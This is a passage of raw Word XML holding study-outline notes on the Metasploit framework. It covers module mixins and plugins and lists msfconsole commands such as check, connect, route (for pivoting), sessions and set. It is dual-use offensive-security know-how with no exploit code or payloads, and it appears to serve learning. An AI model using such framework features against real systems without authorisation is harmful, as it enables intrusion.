        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Modules can overload old methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B660FF" w14:textId="5E114EE4" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit modules inherit Msf::Module and include mixins to add features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590C5C2A" w14:textId="16188830" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Mixins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D59CD" w14:textId="4A4AA53E" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>include one class into another</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB20674" w14:textId="57DA446F" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>different and similar to inheritance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B804298" w14:textId="3D59D8B6" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>can override class methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB7FFB" w14:textId="7283523D" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Add new features and allows modules to have different flavors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F6F422" w14:textId="25111FFE" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>protocol specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D05258C" w14:textId="55F90EBE" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>behavior-specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB77872" w14:textId="3B3691F0" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>implemented by TCP mixin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37896680" w14:textId="4A136053" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>overloaded by FTP, SMB, and others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64632232" w14:textId="253FE20C" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Can change behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECFAFCB" w14:textId="6E8BF56F" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Scanner mixin overloads run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A538BB4" w14:textId="27F6163B" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Scanner changes run() for run_host() and run_range()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BF93ED" w14:textId="24C23917" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>called in parallel based on the THREADS setting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A14F38F" w14:textId="4F234BD4" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>BruteForce mixin is similar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820D2C5" w14:textId="0589AC61" w:rsidR="004B2BD1" w:rsidRDefault="004B2BD1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F087A9B" w14:textId="622AEEC8" w:rsidR="004B2BD1" w:rsidRDefault="00F264D7" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>work directly with API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241763D9" w14:textId="098A05E5" w:rsidR="00F264D7" w:rsidRDefault="00F264D7" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>manipulate whole framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10C543" w14:textId="6B42BB3A" w:rsidR="00F264D7" w:rsidRDefault="00F264D7" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>hook into event subsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A15958E" w14:textId="73B446A5" w:rsidR="00F264D7" w:rsidRDefault="00F264D7" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>automate specific tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607219F" w14:textId="7A6FE6CA" w:rsidR="00F264D7" w:rsidRDefault="00F264D7" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>only work in msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F5BFE1" w14:textId="6291BA8C" w:rsidR="00F264D7" w:rsidRDefault="00F264D7" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>add new console commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACEC236" w14:textId="5318FF45" w:rsidR="00F264D7" w:rsidRDefault="00F264D7" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>extend framework functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0105DD6D" w14:textId="4AB94C66" w:rsidR="00F264D7" w:rsidRDefault="00F264D7" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>METASPLOIT FUNDAMENTALS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B4C7CF" w14:textId="447AD540" w:rsidR="000B3295" w:rsidRDefault="000F5995" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>MSFCLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3753D3D0" w14:textId="58AE81ED" w:rsidR="000F5995" w:rsidRDefault="000F5995" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>MSFCONSOLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BB547D" w14:textId="379C6D70" w:rsidR="000F5995" w:rsidRDefault="000F5995" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Core Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F40ED" w14:textId="18CE1607" w:rsidR="000F5995" w:rsidRDefault="000F5995" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>back – move out of current context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352FBB79" w14:textId="0E4034A5" w:rsidR="000F5995" w:rsidRDefault="000F5995" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>banner – displays randomly selected banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503051F1" w14:textId="11A8DA61" w:rsidR="000F5995" w:rsidRDefault="000F5995" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>check – check to see if a target is vulnerable to a particular exploit instead of exploiting it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709708F3" w14:textId="557FF2E5" w:rsidR="000F5995" w:rsidRDefault="000F5995" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>color – can enable or disable if the output will contain colours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289618EE" w14:textId="679DABDD" w:rsidR="000F5995" w:rsidRDefault="000F5995" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>connect – can connect to a remote host from within msfconsole same as Netcat and Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D7230A" w14:textId="2C40274C" w:rsidR="000F5995" w:rsidRDefault="000F5995" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>uses SSL, proxies, pivoting, and file transfers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3430515F" w14:textId="38B5CA4F" w:rsidR="000F5995" w:rsidRDefault="000F5995" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>edit – will edit current module with $VISUAL or $EDITOR – in vim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311F14DD" w14:textId="588BB35F" w:rsidR="000F5995" w:rsidRDefault="003F0EE1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>grep – matches a given pattern from the output of another msfconsole command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D1A35" w14:textId="13950C35" w:rsidR="003F0EE1" w:rsidRDefault="003F0EE1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>help – give you a list and small description of all available commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58021B67" w14:textId="109D1093" w:rsidR="003F0EE1" w:rsidRDefault="003F0EE1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>info – will provide detailed information about a particular module including all options, targets, and other information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7491966A" w14:textId="1408F717" w:rsidR="003F0EE1" w:rsidRDefault="003F0EE1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>irb – starts a live Ruby interpreter shell to issue commands and create Metasploit scripts quickly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FBEA20" w14:textId="68AD3642" w:rsidR="003F0EE1" w:rsidRDefault="003F0EE1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>jobs – modules running in the background – list and terminate these jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58077477" w14:textId="4950045B" w:rsidR="003F0EE1" w:rsidRDefault="003F0EE1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>kill – kill any running jobs when supplied with job id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC40282" w14:textId="49EE537E" w:rsidR="003F0EE1" w:rsidRDefault="003F0EE1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>load – loads a plugin from metasploits plugin directory, arguments are passed as key=val</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5705DBCB" w14:textId="0578AC98" w:rsidR="003F0EE1" w:rsidRDefault="003F0EE1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>loadpath – will load a third-party module tree for the path to point Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01820516" w14:textId="1D6046E8" w:rsidR="003F0EE1" w:rsidRDefault="003F0EE1" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>unload – unloads a previously loaded plugin and removes any extended commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118CFABD" w14:textId="28EC1206" w:rsidR="006738C8" w:rsidRDefault="006738C8" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">resource </w:t>
      </w:r>
      <w:r w:rsidR="0034558D">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0034558D">
        <w:t>runs resource (batch) files that can be loaded through msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037C2815" w14:textId="00BD58BA" w:rsidR="0034558D" w:rsidRDefault="0034558D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>batch files speed up testing and dev times and allow automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0175FD" w14:textId="57B22D40" w:rsidR="0034558D" w:rsidRDefault="0034558D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>route – route sockets through a session, providing basic pivoting capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697ED76D" w14:textId="687CE8C5" w:rsidR="0034558D" w:rsidRDefault="0034558D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>pass target subnet and network mask followed by session number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFAAC6E" w14:textId="01A4C82C" w:rsidR="0034558D" w:rsidRDefault="0034558D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>search – strings and underscores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299FFEDA" w14:textId="080AB2BA" w:rsidR="0034558D" w:rsidRDefault="0034558D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>help – built in keyword system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D774A16" w14:textId="76A4DA78" w:rsidR="0034558D" w:rsidRDefault="0034558D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>name – descriptive name search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5E2ABA" w14:textId="37A52299" w:rsidR="0034558D" w:rsidRDefault="0034558D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>platform – narrow down search to specific platform targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D2877" w14:textId="2510E9C2" w:rsidR="0034558D" w:rsidRDefault="0034558D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>type – search by auxiliary, post, exploit, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E48973" w14:textId="5E138D83" w:rsidR="0034558D" w:rsidRDefault="0034558D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">author </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F28B867" w14:textId="37C40413" w:rsidR="0034558D" w:rsidRDefault="0034558D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>multiple – combine keywords together to narrow down results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD105F" w14:textId="6B9C3007" w:rsidR="0034558D" w:rsidRDefault="0034558D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>sessions – list, interact with, and kill spawned sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EB6045" w14:textId="3FA38140" w:rsidR="008D7AEB" w:rsidRDefault="008D7AEB" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>sessions -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA2592D" w14:textId="7CBC1084" w:rsidR="008D7AEB" w:rsidRDefault="008D7AEB" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>set – configure framework options and parameters for current module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D2875F" w14:textId="40C8A646" w:rsidR="008D7AEB" w:rsidRDefault="008D7AEB" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>can also set an encoder to use at run-time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FA1D2" w14:textId="0F0AF7B4" w:rsidR="008D7AEB" w:rsidRDefault="008D7AEB" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>unset – removes parameter from configured set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CD791A" w14:textId="1EF96A16" w:rsidR="008D7AEB" w:rsidRDefault="008D7AEB" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>unset all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61679FE3" w14:textId="2C4EF456" w:rsidR="008D7AEB" w:rsidRDefault="008D7AEB" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>setg – set global variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0058B0" w14:textId="0B517644" w:rsidR="008D7AEB" w:rsidRDefault="008D7AEB" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>can be used in any exploits and modules as needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F32D7C2" w14:textId="215B75FD" w:rsidR="008D7AEB" w:rsidRDefault="008D7AEB" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>run save command after setting variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA2B59" w14:textId="4ABB8A67" w:rsidR="008D7AEB" w:rsidRDefault="008D7AEB" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">show – display every module within </w:t>
      </w:r>
      <w:r w:rsidR="0048474E">
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AA857F" w14:textId="4C9D4D7B" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>auxiliary – scanners, dos, fuzzers, etc</w:t>
      </w:r>
    </w:p>
